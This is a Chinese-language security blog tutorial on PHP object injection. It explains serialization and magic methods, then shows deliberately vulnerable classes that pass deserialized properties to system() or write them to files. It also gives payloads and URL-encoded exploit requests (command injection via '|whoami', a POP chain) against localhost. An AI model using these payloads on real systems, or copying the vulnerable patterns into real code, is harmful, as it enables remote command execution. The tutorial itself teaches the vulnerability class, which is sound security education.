
 <!DOCTYPE HTML>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
  
    <title>php-object-injection | </title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="daiker">
    

    
    <meta name="description" content="0x00 序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回ph">
<meta name="keywords" content="ctf,Web,漏洞研究">
<meta property="og:type" content="article">
<meta property="og:title" content="php-object-injection">
<meta property="og:url" content="http://www.daiker.com.cn/2017/12/22/php-object-injection/index.html">
<meta property="og:site_name">
<meta property="og:description" content="0x00 序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回ph">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/5443560-5f8efd5ef26b8c09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/5443560-cfc12545ab7f151a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/5443560-3bcc27f4dd42c0ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/5443560-0065570ad023bfa1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/5443560-7375d79ef4cd9841.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2018-02-22T07:09:58.031Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="php-object-injection">
<meta name="twitter:description" content="0x00 序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回ph">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/5443560-5f8efd5ef26b8c09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta name="twitter:creator" content="@daikersec">

    
    <link rel="alternative" href="/atom.xml" title="" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/favicon.png">
    
    
    <link rel="apple-touch-icon" href="/img/jacman.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/jacman.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>

  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.png" alt="" title=""/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title=""></a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">首页</a></li>
					
						<li><a href="/archives">归档</a></li>
					
						<li><a href="/tags">标签</a></li>
					
						<li><a href="/categories">分类</a></li>
					
					<li>
 					
						<form class="search" action="http://zhannei.baidu.com/cse/search" target="_blank">
							<label>Search</label>
						<input name="s" type="hidden" value= 6197743525332190000 ><input type="text" name="q" size="30" placeholder="Search"><br>
						</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
  
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2017/12/22/php-object-injection/" title="php-object-injection" itemprop="url">php-object-injection</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="daiker" target="_blank" itemprop="author">daiker</a>
		
  <p class="article-time">
    <time datetime="2017-12-22T12:47:40.000Z" itemprop="datePublished"> Published 2017-12-22</time>
    
  </p>
</header>
	<div class="article-content">
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		
			<ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-序列化"><span class="toc-number">1.</span> <span class="toc-text"><a href="#0x00-&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="0x00 &#x5E8F;&#x5217;&#x5316;"></a>0x00 &#x5E8F;&#x5217;&#x5316;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-反序列化"><span class="toc-number">2.</span> <span class="toc-text"><a href="#0x01-&#x53CD;&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="0x01 &#x53CD;&#x5E8F;&#x5217;&#x5316;"></a>0x01 &#x53CD;&#x5E8F;&#x5217;&#x5316;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-魔术函数"><span class="toc-number">3.</span> <span class="toc-text"><a href="#0x02-&#x9B54;&#x672F;&#x51FD;&#x6570;" class="headerlink" title="0x02 &#x9B54;&#x672F;&#x51FD;&#x6570;"></a>0x02 &#x9B54;&#x672F;&#x51FD;&#x6570;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-反序列化漏洞"><span class="toc-number">4.</span> <span class="toc-text"><a href="#0x03-&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;" class="headerlink" title="0x03 &#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;"></a>0x03 &#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-类变量的注意点"><span class="toc-number">5.</span> <span class="toc-text"><a href="#0x04-&#x7C7B;&#x53D8;&#x91CF;&#x7684;&#x6CE8;&#x610F;&#x70B9;" class="headerlink" title="0x04 &#x7C7B;&#x53D8;&#x91CF;&#x7684;&#x6CE8;&#x610F;&#x70B9;"></a>0x04 &#x7C7B;&#x53D8;&#x91CF;&#x7684;&#x6CE8;&#x610F;&#x70B9;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-POP-Chain"><span class="toc-number">6.</span> <span class="toc-text"><a href="#0x05-POP-Chain" class="headerlink" title="0x05 POP Chain"></a>0x05 POP Chain</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-CVE-2016-7124"><span class="toc-number">7.</span> <span class="toc-text"><a href="#0x06-CVE-2016-7124" class="headerlink" title="0x06 CVE-2016-7124"></a>0x06 CVE-2016-7124</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x07-经典案例-未完待续"><span class="toc-number">8.</span> <span class="toc-text"><a href="#0x07-&#x7ECF;&#x5178;&#x6848;&#x4F8B;-&#x672A;&#x5B8C;&#x5F85;&#x7EED;" class="headerlink" title="0x07 &#x7ECF;&#x5178;&#x6848;&#x4F8B;(&#x672A;&#x5B8C;&#x5F85;&#x7EED;)"></a>0x07 &#x7ECF;&#x5178;&#x6848;&#x4F8B;(&#x672A;&#x5B8C;&#x5F85;&#x7EED;)</span></a></li></ol>
		
		</div>
		
		<h2 id="0x00-序列化"><a href="#0x00-序列化" class="headerlink" title="0x00 序列化"></a>0x00 序列化</h2><p>所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 所有php里面的值都可以使用函数<br><a href="http://php.net/manual/zh/function.serialize.php" target="_blank" rel="noopener">serialize()</a><br>来返回一个包含字节流的字符串来表示。<br><a href="http://php.net/manual/zh/function.unserialize.php" target="_blank" rel="noopener">unserialize()</a><br>函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。<br><a id="more"></a><br>序列化的例子<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 15:39:43</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line">error_reporting(E_ALL);</span><br><span class="line">$var_int = 1;</span><br><span class="line">$var_str = &quot;123&quot;;</span><br><span class="line">$var_float = 1.2;</span><br><span class="line">$var_bool =  true;</span><br><span class="line">$var_arr = array(&apos;1&apos; =&gt; 1,1.2,false );</span><br><span class="line">class ClassName   &#123;</span><br><span class="line">    var $var_name = 1;</span><br><span class="line">    function  myfunction()&#123;</span><br><span class="line">        return &quot;1&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">   $arrayName = array($var_int,$var_str,$var_float,$var_bool,$var_arr,new ClassName ());</span><br><span class="line"></span><br><span class="line">   foreach ($arrayName as $key =&gt; $value) &#123;</span><br><span class="line">    echo serialize($value).&quot;&lt;br/&gt;&quot;;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure></p>
<p>结果是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">i:1;</span><br><span class="line">s:3:&quot;123&quot;;</span><br><span class="line">d:1.2;</span><br><span class="line">b:1;</span><br><span class="line">a:3:&#123;i:1;i:1;i:2;d:1.2;i:3;b:0;&#125;</span><br><span class="line">O:9:&quot;ClassName&quot;:1:&#123;s:8:&quot;var_name&quot;;i:1;&#125;</span><br></pre></td></tr></table></figure></p>
<p>从例子中我们可以看到，变量，数组，对象可以被序列化。变量的值会被保存下来。以<code>:</code>隔开，类名会被保存下来，类变量，类变量名和类变量值会被保存下来，类方法不会被保存起来。</p>
<h2 id="0x01-反序列化"><a href="#0x01-反序列化" class="headerlink" title="0x01 反序列化"></a>0x01 反序列化</h2><p>反序列化就是将序列化后的字符串转化回数组和对象<br>看例子<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 16:02:17</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">$un_arr_str = &apos;a:3:&#123;i:1;i:1;i:2;d:1.2;i:3;b:0;&#125;&apos;;//$var_arr = array(&apos;1&apos; =&gt; 1,1.2,false );</span><br><span class="line">$un_class_str = &apos;O:9:&quot;ClassName&quot;:1:&#123;s:8:&quot;var_name&quot;;i:1;&#125;&apos;;</span><br><span class="line">var_dump(unserialize($un_arr_str));</span><br><span class="line">$O = unserialize($un_class_str);</span><br><span class="line">// var_dump($O);</span><br><span class="line">var_dump($O-&gt;var_name);</span><br></pre></td></tr></table></figure></p>
<p>这里的结果是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">array(3) &#123; [1]=&gt; int(1) [2]=&gt; float(1.2) [3]=&gt; bool(false) &#125; </span><br><span class="line">NULL</span><br></pre></td></tr></table></figure></p>
<p>比较奇怪的是为什么第二个会是NULL。因为将对象序列化之后，只是保存它的关键数据，对于这个类的具体内容一无所知。所以反序列回一个对象的时候，需要反序列的上下文中存在模板(这里就是类的定义)。</p>
<h2 id="0x02-魔术函数"><a href="#0x02-魔术函数" class="headerlink" title="0x02 魔术函数"></a>0x02 魔术函数</h2><p>PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法。<br>下面举一个例子。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">class ClassName  &#123;</span><br><span class="line">    </span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        echo &quot;Hello,I am __construct&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">new ClassName();</span><br></pre></td></tr></table></figure></p>
<p>这里的输出结果是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hello,I am __construct</span><br></pre></td></tr></table></figure></p>
<p>其实这里的一个对象实例化的过程中默认会调用的__construct()。<br>php常用的魔术函数有<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__construct()， __destruct()， __call()， __callStatic()， __get()， __set()， __isset()， __unset()， __sleep()， __wakeup()， __toString()， __invoke()， __set_state()， __clone() 和 __debugInfo()</span><br></pre></td></tr></table></figure></p>
<p>这里们并非每个都会在这里面用到，下面用一个例子来说下看几个常用到的魔术函数。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 16:24:32</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">class ClassName  &#123;</span><br><span class="line">    private $name =&quot;123&quot;;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        echo &quot;Hello,I am __construct&quot;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        echo &quot;Hello,I am __destruct&quot;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        echo &quot;Hello,I am __wakeup&quot;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    function __sleep()&#123;</span><br><span class="line">        echo &quot;Hello,I am __sleep&quot;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">        return array($this-&gt;name);</span><br><span class="line">    &#125;</span><br><span class="line">    function __get($name)&#123;</span><br><span class="line">        echo &quot;Hello,I am __get&quot;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">        return $this-&gt;name;</span><br><span class="line">    &#125;</span><br><span class="line">    function __toString()&#123;</span><br><span class="line">        echo &quot;Hello,I am __toString&quot;.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">        return &quot;Hello&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$O = new ClassName();</span><br><span class="line">$s= serialize($O);</span><br><span class="line">echo $s.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">$O = unserialize($s);</span><br><span class="line">$O.&quot;&lt;br/&gt;&quot;;</span><br><span class="line">$O-&gt;nothing;</span><br></pre></td></tr></table></figure></p>
<p>从例子我们可以看出，当初序列化一个对象是默认会调用<code>__sleep</code>，反序列化是会调用<code>__wakeup</code>，而<code>__construct</code>会在实例化一个对象是被调用，<code>__desturct</code>会在对象不再使用或者程序退出时自动调用, <code>__toString</code>会在对象被当做字符串时使用(特别注意字符串连接符<code>.</code>)。<code>__get</code>会在读取不可访问的属性的值的时候调用</p>
<h2 id="0x03-反序列化漏洞"><a href="#0x03-反序列化漏洞" class="headerlink" title="0x03 反序列化漏洞"></a>0x03 反序列化漏洞</h2><p>先举一个反序列化漏洞例子<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 16:45:11</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">class ClassName &#123;</span><br><span class="line">    var $ip;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        system(&apos;ping -c 4&apos;.$this-&gt;ip);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$O = unserialize($_GET[&apos;daiker&apos;]);</span><br></pre></td></tr></table></figure></p>
<p>我们分析这串代码，可以得出一下结论</p>
<ol>
<li>反序列化的的字符串我们可控</li>
<li>反序列化默认会调用<code>__wakeup()</code></li>
<li>变量ip是会保存在反序列化的字符串里面的，我们可控<br>所以我们下面构造payload。<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 16:45:11</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">class ClassName &#123;</span><br><span class="line">    var $ip = &quot;|whoami&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo urlencode(serialize(new ClassName()));</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>然后<br><code>http://127.0.0.1/php-obj/example4.php?daiker=O%3A9%3A%22ClassName%22%3A1%3A%7Bs%3A2%3A%22ip%22%3Bs%3A7%3A%22%7Cwhoami%22%3B%7D</code><br>就可以执行<code>whoami</code>,所以这里就导致RCE<br>所以总结来讲，PHP对象注入(又叫反序列化漏洞)，需要几点条件。</p>
<ol>
<li>反序列化字符串可控</li>
<li>有魔术方法会调用对象属性</li>
</ol>
<p>对于反序列化的漏洞利用的效果取决于魔术方法里面对成员属性的调用方式，如上面的<code>system()</code>就会导致RCE，也可能是注入，任意文件上传等问题。</p>
<h2 id="0x04-类变量的注意点"><a href="#0x04-类变量的注意点" class="headerlink" title="0x04 类变量的注意点"></a>0x04 类变量的注意点</h2><p>看下面一个例子<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 19:08:38</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line">class ClassName&#123;</span><br><span class="line">    </span><br><span class="line">    private $a = 1;</span><br><span class="line">    protected  $b =2;</span><br><span class="line">    public  $c =3;//</span><br><span class="line">&#125;</span><br><span class="line">echo serialize(new ClassName()).&quot;&lt;br/&gt;&quot;;</span><br><span class="line">echo urlencode(serialize(new ClassName()));</span><br></pre></td></tr></table></figure></p>
<p>看输出结果<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:9:&quot;ClassName&quot;:3:&#123;s:12:&quot;ClassNamea&quot;;i:1;s:4:&quot;*b&quot;;i:2;s:1:&quot;c&quot;;i:3;&#125;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A9%3A%22ClassName%22%3A3%3A%7Bs%3A12%3A%22%00ClassName%00a%22%3Bi%3A1%3Bs%3A4%3A%22%00%2A%00b%22%3Bi%3A2%3Bs%3A1%3A%22c%22%3Bi%3A3%3B%7D%</span><br></pre></td></tr></table></figure>
<p>一个个比较，我们会发现不可打印字符打印不出来。如果我们把可打印字符用作payload，会利用失败.<br>如果是private 的变量，序列化的时候就会变成<code>\x00类名\x变量名</code>，这里就是<code>\xClassName\x00a</code>，urlencode之后变成<code>%00ClassName%00a</code>。<br>如果是protected的变量，序列化之后就会变成<code>\x00\x2A\x00变量名</code>。</p>
<h2 id="0x05-POP-Chain"><a href="#0x05-POP-Chain" class="headerlink" title="0x05 POP Chain"></a>0x05 POP Chain</h2><p>前面说到，要找反序列化漏洞，要有两个点。第一个是反序列化的参数可控，第二个是有魔术方法调用对象属性。但是我们往往会遇到一个问题，就是我们反序列化的参数可控，但是，没有合适的魔术方法，或者是魔术方法对对象属性的调用方法无法利用。这时候就有人提出了一个新的思路叫做POP Chain(跟二进制里面的ROP Chain 思路很像)。POP chain利用的条件是找到的魔术方法不可以直接利用，但它有调用其它方法或者使用其它的变量时，可以在其它的类中寻找同名的方法或是变量，直到可以利用的点。<br>下面看一个简单的例子。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 19:41:17</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line">class One&#123;</span><br><span class="line">    function myfunction()&#123;</span><br><span class="line">        echo &quot;Hello,world&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Another&#123;</span><br><span class="line">    var $cmd ;</span><br><span class="line">    function myfunction()&#123;</span><br><span class="line">        $this-&gt;attack();</span><br><span class="line">    &#125;</span><br><span class="line">    function attack()&#123;</span><br><span class="line">        system($this-&gt;cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class ClassName  &#123;</span><br><span class="line">    var $class ;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;class=new One();</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        $this-&gt;class-&gt;myfunction();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$O = unserialize($_GET[&apos;daiker&apos;]);</span><br></pre></td></tr></table></figure></p>
<p>我们分析下代码，可以发现一下几点</p>
<ol>
<li>反序列化参数可控</li>
<li>存在魔术方法__construct()，这里不可以直接利用</li>
<li>__construct()调用了myfunction(),myfunction()不可以利用</li>
<li>其他类存在同名函数myfunction()，且另外一个类里面的Myfunction不可以单独被利用，但是存在可被利用的函数<code>system()</code><br>构造payload<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * </span><br><span class="line"> * @authors daiker (daikersec@gmail.com)</span><br><span class="line"> * @date    2017-12-22 20:26:02</span><br><span class="line"> * @version $Id$</span><br><span class="line"> */</span><br><span class="line">class Another&#123;</span><br><span class="line">    var $cmd;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;cmd = &quot;whoami&quot;;</span><br><span class="line">    &#125;//跟直接写 var $cmd = &quot;whoami&apos;，不写__construct一样，这里演示还有这种写法</span><br><span class="line">&#125;</span><br><span class="line">class ClassName  &#123;</span><br><span class="line">    var $class ;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;class=new Another();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">echo serialize(new ClassName());</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>然后提交<br><code>http://127.0.0.1/php-obj/pop.php?daiker=O:9:%22ClassName%22:1:{s:5:%22class%22;O:7:%22Another%22:1:{s:3:%22cmd%22;s:6:%22whoami%22;}}</code></p>
<h2 id="0x06-CVE-2016-7124"><a href="#0x06-CVE-2016-7124" class="headerlink" title="0x06 CVE-2016-7124"></a>0x06 CVE-2016-7124</h2><p>我们看一个代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> class object&#123; </span><br><span class="line">		public $var = &quot;hello,world&quot;;</span><br><span class="line">  </span><br><span class="line">        function get_flag()&#123;  </span><br><span class="line">            return &apos;aaaa&apos;;  </span><br><span class="line">        &#125;</span><br><span class="line">		function __wakeup()&#123;</span><br><span class="line">			$this-&gt;var = &quot;hello,wold&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">		function __destruct()&#123;</span><br><span class="line">			$fp=fopen(&quot;F:\\phpStudy\\WWW\\unse\\hello.php&quot;,&quot;w&quot;);</span><br><span class="line">			fputs($fp,$this-&gt;var);</span><br><span class="line">			fclose($fp);</span><br><span class="line">		&#125;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line">$content = $_POST[&apos;content&apos;];</span><br><span class="line">$object = unserialize($content);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>对比上面的代码，可以发现多了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function __wakeup()&#123;</span><br><span class="line">          $this-&gt;var = &quot;hello,wold&quot;;</span><br><span class="line">      &#125;</span><br></pre></td></tr></table></figure></p>
